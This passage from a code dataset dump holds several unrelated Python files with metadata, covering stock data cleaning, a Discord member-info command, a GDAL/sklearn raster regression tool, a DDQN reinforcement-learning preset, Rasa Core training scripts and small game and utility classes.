True)\r\n base[['adj_close','close','high','low','open','volume']] = base[['adj_close','close','high','low','open','volume']].astype(float)\r\n except:\r\n pass\r\n base = base[~(base.timestamp.astype(str).str.contains('b'))]\r\n base = base[ ~np.isnan(base.adj_close) ].reset_index(drop = True)\r\n base = base.drop_duplicates().reset_index(drop = True)\r\n base.timestamp = base.timestamp.astype('datetime64[D]')\r\n base = base.drop(['ID'], axis = 1)\r\n del(totalSeriesYahoo,timeSeries,timeSeriesExtra)\r\n #baseMerge = pd.merge(base, uniqueDates, left_on = 'timestamp', right_on = 'timestamp')\r\n \r\n colList = ['adj_close']\r\n for col in colList:\r\n print(col)\r\n cutDates = True if col == 'adj_close' else False\r\n basePivot = base.pivot_table(index = 'timestamp', columns = 'ticker', values = col, aggfunc = sum)\r\n \r\n ## cleanData\r\n ## Note when we clean and append the data from the daily fundementals, if tbe high or low or whatever is nan in the fundemental data for particular \r\n ## tickers, these will be dropped from the clean set, however these will persist in the trend following if the adj_close data is ok.\r\n \r\n baseClean = DataOps(timeSeriesData = basePivot)\r\n baseCleanMelt,_ = baseClean.cleanseTimeSeries(fundementalPrices = closePriceData[closePriceData.symbol.isin(basePivot.columns) ], fundColName = col, \\\r\n cutMissingDates = cutDates,dates = dates, cores = 4)\r\n if col == 'adj_close':\r\n volPivot = base.pivot_table(index = 'timestamp', columns = 'ticker', values = 'volume', aggfunc = sum)\r\n volClean = DataOps(timeSeriesData = volPivot[ baseCleanMelt.columns])\r\n volsCleanMelt,_ = volClean.cleanseTimeSeries(fundementalPrices = closePriceData[closePriceData.symbol.isin(volPivot.columns) ], fundColName = 'volume', \r\n justFill = True,dates = dates)\r\n volsCleanMeltDF = volsCleanMelt.copy()\r\n volsCleanMeltDF.reset_index(inplace = True)\r\n volsCleanMeltDF = volsCleanMeltDF.rename(columns = {'index':'timestamp'})\r\n volsCleanMeltDF = pd.melt(volsCleanMeltDF, id_vars = ['timestamp'])\r\n volsCleanMeltDF = volsCleanMeltDF.rename(columns = {'value':'volume'})\r\n \r\n baseCleanDF = baseCleanMelt.copy()\r\n volCleanDF = volsCleanMelt.copy()\r\n \r\n del(baseCleanMelt, baseClean, basePivot, volClean, volsCleanMelt, volPivot, volsCleanMeltDF)\r\n gc.collect()\r\n \r\n '''############### get returns and stats ################'''\r\n \r\n baseClean = DataOps(timeSeriesData = baseCleanDF, volData = volCleanDF)\r\n #baseClean.getStats()\r\n #stats.append(baseClean.statsReport)\r\n tickExchangeMap = pd.merge(pd.DataFrame({'ticker':baseClean.timeSeriesData.columns}), tickExchange, on = 'ticker')\r\n tickExchangeMap = pd.merge(tickExchangeMap, exchangeMap[['yahoo_exchange','ccy','level']], left_on = 'exchange', right_on = 'yahoo_exchange')\r\n ##adjust ccy for ccy pairs not in USD\r\n tickExchangeMap.ccy[ tickExchangeMap.ticker.str.contains('=X') & (tickExchangeMap.ticker.str.len() > 5)] = \\\r\n tickExchangeMap[ tickExchangeMap.ticker.str.contains('=X') & (tickExchangeMap.ticker.str.len() > 5)].ticker.str[3:6].values\r\n tickExchangeMap = pd.merge(tickExchangeMap, fx[['ccy','fx']], left_on = 'ccy', right_on = 'ccy')\r\n \r\n ## need to add ccy timeSeries exchanges to data as they are not in exchangeMap\r\n ccys = pd.DataFrame({'ticker':baseClean.timeSeriesData.columns})[ pd.DataFrame({'ticker':baseClean.timeSeriesData.columns}).ticker.str.contains('=')]\r\n appendCcys = pd.DataFrame({'ticker':ccys.ticker,\r\n 'exchange':ccys.ticker,\r\n 'yahoo_exchange':ccys.ticker,\r\n 'level':1,\r\n 'ccy':'ccy'}).reset_index(drop = True)\r\n ## long ccys have to stay as they are as we want to see patterns of different ccys against eachother - filter them into a different report?\r\n longCcy = np.where(appendCcys.ticker.str.len() == 8)[0]\r\n shortCcy = np.where(appendCcys.ticker.str.len() == 5)[0]\r\n appendCcys['fx'] = 1\r\n appendCcys['fx'][shortCcy] = fx.fx[ fx.symbol.isin(appendCcys.ticker[shortCcy.tolist()])]\r\n appendCcys['ccy'][shortCcy] = 'GBP'\r\n tickExchangeMap = pd.concat([tickExchangeMap, appendCcys]) .reset_index(drop = True)\r\n tickExchangeMap = \\\r\n tickExchangeMap.drop_duplicates('ticker').reset_index(drop = True)\r\n if baseClean.timeSeriesData.shape[1] > 1:\r\n baseClean.getWaveRider(tickExchangeMap = tickExchangeMap)\r\n \r\n closePriceData = closePriceData[ closePriceData.timestamp == closePriceData.timestamp.max()][['symbol','volume','earnings_per_share','eps_estimate_current_year','eps_estimate_next_year','eps_estimate_next_quarter','price__to__book','p_to_e_ratio','peg_ratio','price__to__eps_estimate_current_year','price__to__eps_estimate_next_year','market_capitalization','short_ratio','average_daily_volume']]\r\n upReport = pd.merge(baseClean.logCrossPastUp,closePriceData, left_on = 'ticker', right_on = 'symbol')\r\n downReport = pd.merge(baseClean.logCrossPastDown,closePriceData, left_on = 'ticker', right_on = 'symbol')\r\n \r\n \r\n closePriceData = closePriceData[ closePriceData.timestamp == closePriceData.timestamp.max()][['symbol','volume','market_capitalization','short_ratio','average_daily_volume']]\r\n climbReport = pd.merge(baseClean.logClimbing, base[['ticker','type']].drop_duplicates(), on = ['ticker']).reset_index(drop = True)\r\n climbReport = pd.merge(climbReport,closePriceData, left_on = 'ticker', right_on = 'symbol')\r\n momentum = pd.merge(baseClean.momentum, base[['ticker','type']].drop_duplicates(), on = ['ticker']).reset_index(drop = True)\r\n momentum = pd.merge(momentum,closePriceData, left_on = 'ticker', right_on = 'symbol')\r\n\r\n \r\n \r\n climbReportCross = pd.merge(baseClean.logCrossPastUpClimbing, base[['ticker','type']].drop_duplicates(), on = ['ticker']).reset_index(drop = True)\r\n #upReport = pd.merge(upReport,base, left_on = 'ticker', right_on = 'ticker')\r\n #downReport = pd.merge(downReport,base, left_on = 'ticker', right_on = 'ticker')\r\n \r\n \r\n logCrossPastUp.append(upReport)\r\n logCrossPastDown.append(downReport)\r\n logCrossPastUpClimbing.append(climbReportCross)\r\n logClimbing.append(climbReport)\r\n logMomentum.append(momentum)\r\n logCrossNowUp.append(baseClean.logCrossNowUp)\r\n logCrossNowDown.append(baseClean.logCrossNowDown)\r\n logDecelerateUp.append(baseClean.logDecelerateUp)\r\n logDecelerateDown.append(baseClean.logDecelerateDown)\r\n breakOutsUp.append(baseClean.breakOutReportUp)\r\n breakOutsDown.append(baseClean.breakOutReportDown)\r\n \r\n del(baseClean)\r\n gc.collect()\r\n\r\n\r\nlogCrossPastUp = pd.concat(logCrossPastUp).reset_index(drop = True).to_csv('C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\Incubator\\\\IncubateCrossPastUp_' + str(np.datetime64(datetime.now().date())).replace('-','') + '.csv', sep =',')\r\nlogCrossPastDown = pd.concat(logCrossPastDown).reset_index(drop = True).to_csv('C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\Incubator\\\\IncubateCrossPastDown_' + str(np.datetime64(datetime.now().date())).replace('-','') + '.csv', sep =',')\r\nlogCrossPastUpClimbing = pd.concat(logCrossPastUpClimbing).reset_index(drop = True).to_csv('C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\Incubator\\\\IncubateCrossPastUpClimbing' + str(np.datetime64(datetime.now().date())).replace('-','') + '.csv', sep =',')\r\nlogClimbing = pd.concat(logClimbing).reset_index(drop = True).to_csv('C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\Incubator\\\\IncubateClimbing' + str(np.datetime64(datetime.now().date())).replace('-','') + '.csv', sep =',')\r\nmomentum = pd.concat(logMomentum).reset_index(drop = True).to_csv('C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\Incubator\\\\IncubateMomentum' + str(np.datetime64(datetime.now().date())).replace('-','') + '.csv', sep =',')\r\n \r\n ","sub_path":"1st iteration/Archive/Incubate.py","file_name":"Incubate.py","file_ext":"py","file_size_in_byte":17140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"377643653","text":"import discord\n\nfrom discord.ext import commands\n\nclass utility(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def joined(self, ctx, member : str):\n \"\"\"Says when a member joined.\"\"\"\n if str(ctx.message.author.id) != '194972515460710400':\n return\n\n if len(member) > 20:\n await ctx.send('Invalid ID.')\n return\n try:\n member_obj = await commands.MemberConverter().convert(ctx, member)\n except:\n await ctx.send('User not found.')\n return\n\n icon_url = member_obj.avatar_url_as()\n e = discord.Embed(type='rich', title='User Details', color=int('e6ffff', 16))\n e.set_thumbnail(url=icon_url)\n e.add_field(name='Name', value=str(member_obj))\n e.add_field(name='ID', value=member_obj.id)\n e.add_field(name='Nickname', value=member_obj.nick)\n e.add_field(name='Date Joined', value=member_obj.joined_at.strftime(\"%c\"))\n s = ', '.join([role.name for role in member_obj.roles[1:]])\n e.add_field(name='Roles', value=s)\n\n await ctx.send(embed=e)\n\ndef setup(bot):\n bot.add_cog(utility(bot))\n\n\n\n","sub_path":"cogs/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"22578268","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nclass paramsClass:\n def __init__(self):\n return\n \nperformanceParams = paramsClass()\neconomicParams = paramsClass()\nsysParams = paramsClass()\n\neconomicParams.k=0.001\neconomicParams.dDecay=2.\neconomicParams.dScale=5\neconomicParams.g=0.04\neconomicParams.A=1\neconomicParams.u=1.\neconomicParams.a=0.95\neconomicParams.b=0.9\neconomicParams.t1=1.\neconomicParams.t2=np.inf\neconomicParams.citySize = 10.\n\neconomicParams.balancedTheta = (1-economicParams.a)/(1-economicParams.a*economicParams.b)\n\nperformanceParams.steps = 1000\n\ndef initZ():\n return np.linspace(200,0,performanceParams.steps)\n #return np.linspace(200,0,performanceParams.steps)\n\nperformanceParams.initialZ = initZ\n\nsysParams.outpath = \"..\\\\..\\\\outsg\" #\"d:\\\\UrbanModels\\\\outsg\"\nsysParams.zpath = \"..\\\\zs\"","sub_path":"params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"156875100","text":"import pygame\nfrom pygame.locals import *\nimport random\n\n\nclass Enemy(pygame.sprite.Sprite):\n enemy_image = None\n\n def __init__(self):\n super(Enemy, self).__init__()\n if Enemy.enemy_image == None:\n Enemy.enemy_image = pygame.image.load(\n 'assets/missile.png').convert()\n Enemy.enemy_image.set_colorkey((255, 255, 255), RLEACCEL)\n self.image = Enemy.enemy_image\n self.rect = self.image.get_rect(\n center=(random.randint(820, 900), random.randint(0, 600)))\n self.speed = random.randint(4, 8)\n\n def update(self):\n self.rect.move_ip(-self.speed, 0)\n if self.rect.right < 0:\n self.kill()\n","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"89828376","text":"import os\n\n\nclass Config(object):\n SECRET_KEY = os.environ.get('SECRET_KEY') or \"you will never guess\"\n\nhost = os.getenv('HOST')\nport = os.getenv('PORT')\nswagger_url = os.getenv('SWAGGER_URL') or \"http://addressindex-api-beta.apps.devtest.onsclofo.uk/assets/swagger.json\"\napi_url = os.getenv('API_URL') or \"http://addressindex-api-beta.apps.devtest.onsclofo.uk\"\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"115921361","text":"from osgeo import ogr\nimport gdal\nimport numpy as np\nimport pandas as pd\nimport sklearn.linear_model as sk\n\nclass RegMapper():\n def __init__(self, sampled_points, rasters):\n self.shapefile_path = sampled_points\n self.regression_list = list()\n self.raster_list = rasters\n self.array_list = []\n self.CreateRegressionList(self.raster_list)\n def NumRasters(self):\n return (len(self.raster_list))\n def AddRasters(self, rasters):\n self.raster_list.append(rasters)\n return 0\n def SetRSquare(self,R):\n self.RS = R\n def GetRSquared(self):\n return self.RS\n def SetCoef(self,coef):\n self.coef = coef\n def GetCoef(self):\n return self.coef\n def SetIntercept(self,intercept):\n self.intercept = intercept\n def GetIntercept(self):\n return self.intercept\n def GetRegressionList(self):\n return self.regression_list\n def GetRasterList(self):\n return self.raster_list\n def ExtractPointValue(self, raster, x, y):\n raster_open = gdal.Open(raster)\n raster_array = raster_open.ReadAsArray().astype(np.float)\n transform = raster_open.GetGeoTransform()\n transform_inverse = gdal.InvGeoTransform(transform)\n transformed_points = gdal.ApplyGeoTransform(transform_inverse, float(x), float(y))\n x_int = int(transformed_points[0])\n y_int = int(transformed_points[1])\n raster_open = None\n return raster_array[y_int, x_int]\n\n def CreateRegressionList(self, rasters):\n id_cnt = 0\n shapefile_driver = ogr.GetDriverByName(\"ESRI Shapefile\")\n shapefile_sample = self.shapefile_path\n sample_source = shapefile_driver.Open(shapefile_sample, 1)\n sample_layer = sample_source.GetLayer()\n testlist = list()\n for feature in sample_layer:\n testlist.append(feature)\n for feature in testlist:\n raster_vals = []\n geom_sample = feature.GetGeometryRef()\n geomstr = str(geom_sample)\n geom_xy_str = geomstr[7:-1]\n geom_xy = geom_xy_str.split()\n sample_value = int(feature.GetField(\"value_\"))\n for i in rasters:\n val = self.ExtractPointValue(i, geom_xy[0], geom_xy[1])\n raster_vals.append(val)\n sample_vals = [int(id_cnt), geom_sample, float(geom_xy[0]), float(geom_xy[1]),\n sample_value]\n for i in range(len(rasters)):\n sample_vals.append(raster_vals[i])\n self.regression_list.append(sample_vals)\n id_cnt += 1\n\n def PerformRegression(self):\n import regression\n self.lm = sk.LinearRegression()\n raster_num = 0\n combined_list = []\n self.array_queue_list = []\n for i in self.regression_list:\n raster_value_list = list()\n for z in i[4:]:\n raster_value_list.append(z)\n combined_list.append(raster_value_list)\n regression_array = np.zeros(shape=(len(self.regression_list), len(combined_list[0])))\n for i in range(len(combined_list)):\n regression_array[i] = combined_list[i]\n len_array = []\n for i in range(len(combined_list[0])-1):\n len_array.append(i+1)\n self.final_list = regression_array\n self.lm.fit(\n regression_array[:, len_array].reshape(len(regression_array[:, len_array]),\n len_array[-1]), regression_array[:, 0])\n self.SetCoef(self.lm.coef_)\n self.SetRSquare(self.lm.score(\n regression_array[:, len_array].reshape(len(regression_array[:, len_array]),\n len_array[-1]), regression_array[:, 0]))\n get_shape_open = gdal.Open(self.raster_list[1])\n get_shape = get_shape_open.ReadAsArray().astype(np.float)\n raster_shape = get_shape.shape\n get_shape_open = None\n base_array = np.full(raster_shape, self.lm.intercept_)\n self.SetIntercept(self.lm.intercept_)\n sublist =regression.InitializeRegression(self.regression_list,self.raster_list,self.lm.coef_)\n for i in sublist:\n base_array = np.add(base_array, i)\n self.outraster = base_array\n for cell in np.nditer(self.outraster, op_flags=['readwrite']):\n if cell < 0:\n cell[...] = 0\n\n def CreateRaster(self,outlocation):\n projection_raster = gdal.Open(self.raster_list[0])\n geotrans = projection_raster.GetGeoTransform()\n pixels_x = projection_raster.RasterXSize # Number of pixels wide\n pixels_y = projection_raster.RasterYSize # Number of pixels tall\n pixel_size = geotrans[1] # Pixel size (must be same in both directions)\n origin_x = geotrans[0] # Upper left corner X\n origin_y = geotrans[3] # Upper left corner Y\n driver = gdal.GetDriverByName('GTiff')\n output_raster = driver.Create(outlocation, pixels_x, pixels_y, 1, gdal.GDT_Float32)\n output_raster.SetGeoTransform((origin_x, pixel_size, 0, origin_y, 0, -pixel_size))\n output_raster_projection_wkt = projection_raster.GetProjection()\n output_raster.SetProjection(output_raster_projection_wkt)\n output_raster.GetRasterBand(1).WriteArray(self.outraster)\n output_raster.FlushCache()\n projection_raster = None\n return print('Output raster successfully written')\n def CreateExcel(self):\n pd_columns = ['Observation Value']\n for i in range(len(self.final_list[0][1:])):\n pd_columns.append('Raster {0} Value'.format(i))\n\n df = pd.DataFrame.from_records(self.final_list, columns=pd_columns)\n\n # Create a Pandas Excel writer using XlsxWriter as the engine.\n writer = pd.ExcelWriter('pandas_simple.xlsx', engine='xlsxwriter')\n\n # Convert the dataframe to an XlsxWriter Excel object.\n df.to_excel(writer, sheet_name='Regression Data')\n\n # Close the Pandas Excel writer and output the Excel file.\n writer.save()\n#if __name__ == '__main__':\n","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"193348481","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '0.1'\n\ntests_require = []\n\nsetup(\n name='scitran.reaper',\n version=version,\n description='Data collection service',\n classifiers=[\n 'Programming Language :: Python',\n ],\n keywords='scitran',\n author='Gunnar Schaefer',\n author_email='gsfr@stanford.edu',\n url='http://scitran.github.io/',\n packages=find_packages(),\n namespace_packages=['scitran'],\n install_requires=[\n 'pytz',\n 'tzlocal',\n 'requests',\n 'pydicom',\n 'numpy',\n 'nibabel',\n 'dcmstack',\n 'scitran.data',\n ],\n entry_points={\n 'console_scripts': [\n 'dicom_net_reaper=scitran.reaper.dicom_net_reaper:main',\n 'dicom_file_reaper=scitran.reaper.dicom_file_reaper:main',\n 'pfile_reaper=scitran.reaper.pfile_reaper:main',\n ],\n },\n tests_require=tests_require,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"190472132","text":"from torch.optim import Adam\nfrom all.agents import DDQN\nfrom all.approximation import QNetwork, FixedTarget\nfrom all.logging import DummyWriter\nfrom all.memory import PrioritizedReplayBuffer\nfrom all.optim import LinearScheduler\nfrom all.policies import GreedyPolicy\nfrom .models import dueling_fc_relu_q\n\n\ndef ddqn(\n # Common settings\n device=\"cpu\",\n discount_factor=0.99,\n # Adam optimizer settings\n lr=1e-3,\n # Training settings\n minibatch_size=64,\n update_frequency=1,\n target_update_frequency=100,\n # Replay buffer settings\n replay_start_size=1000,\n replay_buffer_size=10000,\n # Exploration settings\n initial_exploration=1.,\n final_exploration=0.,\n final_exploration_frame=10000,\n # Prioritized replay settings\n alpha=0.2,\n beta=0.6,\n):\n \"\"\"\n Dueling Double DQN with Prioritized Experience Replay (PER).\n\n Args:\n device (str): The device to load parameters and buffers onto for this agent.\n discount_factor (float): Discount factor for future rewards.\n last_frame (int): Number of frames to train.\n lr (float): Learning rate for the Adam optimizer.\n minibatch_size (int): Number of experiences to sample in each training update.\n update_frequency (int): Number of timesteps per training update.\n target_update_frequency (int): Number of timesteps between updates the target network.\n replay_start_size (int): Number of experiences in replay buffer when training begins.\n replay_buffer_size (int): Maximum number of experiences to store in the replay buffer.\n initial_exploration (int): Initial probability of choosing a random action,\n decayed until final_exploration_frame.\n final_exploration (int): Final probability of choosing a random action.\n final_exploration_frame (int): The frame where the exploration decay stops.\n alpha (float): Amount of prioritization in the prioritized experience replay buffer.\n (0 = no prioritization, 1 = full prioritization)\n beta (float): The strength of the importance sampling correction for prioritized experience replay.\n (0 = no correction, 1 = full correction)\n \"\"\"\n def _ddqn(env, writer=DummyWriter()):\n model = dueling_fc_relu_q(env).to(device)\n optimizer = Adam(model.parameters(), lr=lr)\n q = QNetwork(\n model,\n optimizer,\n target=FixedTarget(target_update_frequency),\n writer=writer\n )\n policy = GreedyPolicy(\n q,\n env.action_space.n,\n epsilon=LinearScheduler(\n initial_exploration,\n final_exploration,\n replay_start_size,\n final_exploration_frame,\n name=\"epsilon\",\n writer=writer\n )\n )\n replay_buffer = PrioritizedReplayBuffer(\n replay_buffer_size,\n alpha=alpha,\n beta=beta,\n device=device\n )\n return DDQN(q, policy, replay_buffer,\n discount_factor=discount_factor,\n replay_start_size=replay_start_size,\n update_frequency=update_frequency,\n minibatch_size=minibatch_size)\n return _ddqn\n\n\n__all__ = [\"ddqn\"]\n","sub_path":"all/presets/classic_control/ddqn.py","file_name":"ddqn.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"181246875","text":"import numpy as np\n\ndef inputData(path):\n\tx = y = np.array([])\n\twith open(path) as f:\n\t\tcontent = [(float(x.strip().split()[0]),float(x.strip().split()[1])) for x in f.readlines()]\n\t\n\t\tx = np.array([x[0] for x in content])\n\t\ty = np.array([x[1] for x in content])\n\t\tmaxVal = max(np.concatenate((x,y)))\n\t\tx = x/maxVal\n\t\ty = y/maxVal\n\n\treturn (x,y)\n\n#NVAR=len(x)","sub_path":"src/inputData.py","file_name":"inputData.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"396876271","text":"import argparse\nimport logging\nimport os\nimport tempfile\nfrom typing import Text, Dict, Optional\n\nimport rasa_core.cli.train\nfrom rasa_core import config, cli\nfrom rasa_core import utils\nfrom rasa_core.broker import PikaProducer\nfrom rasa_core.domain import TemplateDomain\nfrom rasa_core.interpreter import NaturalLanguageInterpreter\nfrom rasa_core.run import AvailableEndpoints\nfrom rasa_core.tracker_store import TrackerStore\nfrom rasa_core.training.dsl import StoryFileReader\nfrom rasa_core.utils import set_default_subparser\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_argument_parser():\n \"\"\"Parse all the command line arguments for the training script.\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Train a dialogue model for Rasa Core. '\n 'The training will use your conversations '\n 'in the story training data format and '\n 'your domain definition to train a dialogue '\n 'model to predict a bots actions.')\n parent_parser = argparse.ArgumentParser(add_help=False)\n cli.train.add_general_args(parent_parser)\n\n subparsers = parser.add_subparsers(\n help='Training mode of core.',\n dest='mode')\n subparsers.required = True\n\n train_parser = subparsers.add_parser(\n 'default',\n help='train a dialogue model',\n parents=[parent_parser])\n compare_parser = subparsers.add_parser(\n 'compare',\n help='train multiple dialogue models to compare '\n 'policies',\n parents=[parent_parser])\n interactive_parser = subparsers.add_parser(\n 'interactive',\n help='teach the bot with interactive learning',\n parents=[parent_parser])\n\n cli.train.add_compare_args(compare_parser)\n cli.train.add_interactive_args(interactive_parser)\n cli.train.add_train_args(train_parser)\n\n return parser\n\n\ndef train(domain_file: Text, stories_file: Text, output_path: Text,\n interpreter: Optional[NaturalLanguageInterpreter] = None,\n endpoints: AvailableEndpoints = AvailableEndpoints(),\n dump_stories: bool = False,\n policy_config: Text = None,\n exclusion_percentage: int = None,\n kwargs: Optional[Dict] = None):\n from rasa_core.agent import Agent\n\n if not kwargs:\n kwargs = {}\n\n policies = config.load(policy_config)\n\n agent = Agent(domain_file,\n generator=endpoints.nlg,\n action_endpoint=endpoints.action,\n interpreter=interpreter,\n policies=policies)\n\n data_load_args, kwargs = utils.extract_args(kwargs,\n {\"use_story_concatenation\",\n \"unique_last_num_states\",\n \"augmentation_factor\",\n \"remove_duplicates\",\n \"debug_plots\"})\n\n training_data = agent.load_data(stories_file,\n exclusion_percentage=exclusion_percentage,\n **data_load_args)\n agent.train(training_data, **kwargs)\n agent.persist(output_path, dump_stories)\n\n return agent\n\n\ndef _additional_arguments(args):\n additional = {\n \"augmentation_factor\": args.augmentation,\n \"debug_plots\": args.debug_plots\n }\n # remove None values\n return {k: v for k, v in additional.items() if v is not None}\n\n\ndef train_comparison_models(stories,\n domain,\n output_path=\"\",\n exclusion_percentages=None,\n policy_configs=None,\n runs=1,\n dump_stories=False,\n kwargs=None):\n \"\"\"Train multiple models for comparison of policies\"\"\"\n\n exclusion_percentages = exclusion_percentages or []\n policy_configs = policy_configs or []\n\n for r in range(runs):\n logging.info(\"Starting run {}/{}\".format(r + 1, runs))\n\n for i in exclusion_percentages:\n current_round = exclusion_percentages.index(i) + 1\n\n for policy_config in policy_configs:\n policies = config.load(policy_config)\n\n if len(policies) > 1:\n raise ValueError(\"You can only specify one policy per \"\n \"model for comparison\")\n\n policy_name = type(policies[0]).__name__\n output = os.path.join(output_path, 'run_' + str(r + 1),\n policy_name +\n str(current_round))\n\n logging.info(\"Starting to train {} round {}/{}\"\n \" with {}% exclusion\"\n \"\".format(policy_name, current_round,\n len(exclusion_percentages), i))\n\n train(\n domain, stories, output,\n policy_config=policy_config,\n exclusion_percentage=i,\n kwargs=kwargs,\n dump_stories=dump_stories)\n\n\ndef get_no_of_stories(story_file, domain):\n \"\"\"Get number of stories in a file.\"\"\"\n\n stories = StoryFileReader.read_from_folder(story_file,\n TemplateDomain.load(domain))\n return len(stories)\n\n\ndef do_default_training(cmdline_args, stories, additional_arguments):\n \"\"\"Train a model.\"\"\"\n\n train(domain_file=cmdline_args.domain,\n stories_file=stories,\n output_path=cmdline_args.out,\n dump_stories=cmdline_args.dump_stories,\n policy_config=cmdline_args.config[0],\n kwargs=additional_arguments)\n\n\ndef do_compare_training(cmdline_args, stories, additional_arguments):\n train_comparison_models(stories,\n cmdline_args.domain,\n cmdline_args.out,\n cmdline_args.percentages,\n cmdline_args.config,\n cmdline_args.runs,\n cmdline_args.dump_stories,\n additional_arguments)\n\n no_stories = get_no_of_stories(cmdline_args.stories,\n cmdline_args.domain)\n\n # store the list of the number of stories present at each exclusion\n # percentage\n story_range = [no_stories - round((x / 100.0) * no_stories)\n for x in cmdline_args.percentages]\n\n story_n_path = os.path.join(cmdline_args.out, 'num_stories.json')\n utils.dump_obj_as_json_to_file(story_n_path, story_range)\n\n\ndef do_interactive_learning(cmdline_args, stories, additional_arguments=None):\n _endpoints = AvailableEndpoints.read_endpoints(cmdline_args.endpoints)\n _interpreter = NaturalLanguageInterpreter.create(cmdline_args.nlu,\n _endpoints.nlu)\n from rasa_core.agent import Agent\n from rasa_core.training import interactive\n\n if cmdline_args.core:\n if cmdline_args.finetune:\n raise ValueError(\"--core can only be used without \"\n \"--finetune flag.\")\n\n logger.info(\"Loading a pre-trained model. This means that \"\n \"all training-related parameters will be ignored.\")\n\n _broker = PikaProducer.from_endpoint_config(_endpoints.event_broker)\n _tracker_store = TrackerStore.find_tracker_store(\n None,\n _endpoints.tracker_store,\n _broker)\n\n _agent = Agent.load(cmdline_args.core,\n interpreter=_interpreter,\n generator=_endpoints.nlg,\n tracker_store=_tracker_store,\n action_endpoint=_endpoints.action)\n else:\n if cmdline_args.out:\n model_directory = cmdline_args.out\n else:\n model_directory = tempfile.mkdtemp(suffix=\"_core_model\")\n\n _agent = train(cmdline_args.domain,\n stories,\n model_directory,\n _interpreter,\n _endpoints,\n cmdline_args.dump_stories,\n cmdline_args.config[0],\n None,\n additional_arguments)\n\n interactive.run_interactive_learning(\n _agent, stories,\n finetune=cmdline_args.finetune,\n skip_visualization=cmdline_args.skip_visualization)\n\n\nif __name__ == '__main__':\n\n # Running as standalone python application\n arg_parser = create_argument_parser()\n set_default_subparser(arg_parser, 'default')\n cmdline_arguments = arg_parser.parse_args()\n additional_args = _additional_arguments(cmdline_arguments)\n\n utils.configure_colored_logging(cmdline_arguments.loglevel)\n\n training_stories = rasa_core.cli.train.stories_from_cli_args(\n cmdline_arguments)\n\n if cmdline_arguments.mode == 'default':\n do_default_training(cmdline_arguments,\n training_stories,\n additional_args)\n\n elif cmdline_arguments.mode == 'interactive':\n do_interactive_learning(cmdline_arguments,\n training_stories,\n additional_args)\n\n elif cmdline_arguments.mode == 'compare':\n do_compare_training(cmdline_arguments,\n training_stories,\n additional_args)\n","sub_path":"rasa_core/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"140806777","text":"from garbage import Garbage\nfrom paper_garbage import PaperGarbage\nfrom plastic_garbage import PlasticGarbage\nfrom dustbin_content_error import DustbinContentError\n\n\nclass Dustbin:\n\n def __init__(self, color):\n self.color = color\n self.paper_content = []\n self.plastic_content = []\n self.house_waste_content = []\n\n def throw_out_garbage(self, garbage): # sort garbage based on type\n if isinstance(garbage, Garbage):\n if isinstance(garbage, PlasticGarbage):\n if garbage.is_clean: # if clean, goes into plastic, otherwise can't be thrown away\n self.plastic_content.append(garbage)\n else:\n raise DustbinContentError\n elif isinstance(garbage, PaperGarbage):\n if garbage.is_squeezed: # if squeezed, goes into paper, otherwise can't be thrown away\n self.paper_content.append(garbage)\n else:\n raise DustbinContentError\n else: # not plastic nor paper\n self.house_waste_content.append(garbage)\n else: # not in garbage type\n raise DustbinContentError\n\n def empty_contents(self): # empties the garbage lists\n del self.paper_content[:]\n del self.plastic_content[:]\n del self.house_waste_content[:]\n","sub_path":"dustbin.py","file_name":"dustbin.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"479415374","text":"def to_int_list(l, split):\n l = l.split(split)\n l = all_to_int(l)\n return l\n\n\ndef all_to_int(x):\n while \"null\" in x:\n x.remove(\"null\")\n for i in range(len(x)):\n x[i] = int(x[i])\n return x\n\n\nnum = int(input())\nrec = []\nfor i in range(num):\n rec.append(to_int_list(input(), \" \"))\nres = \"YES\"\ntemp = []\nfor i in range(num):\n if i == 0:\n temp.append(max(rec[0][1], rec[0][1]))\n else:\n m = max(rec[i][0], rec[i][1])\n if m <= temp[i-1]:\n temp.append(m)\n elif min(rec[i][0], rec[i][1]) > temp[i-1]:\n res = \"NO\"\n break\n else:\n temp.append(min(rec[i][0], rec[i][1]))\nprint(res)","sub_path":"Code/CodeRecords/2910/60719/292991.py","file_name":"292991.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409817778","text":"import tensorflow as 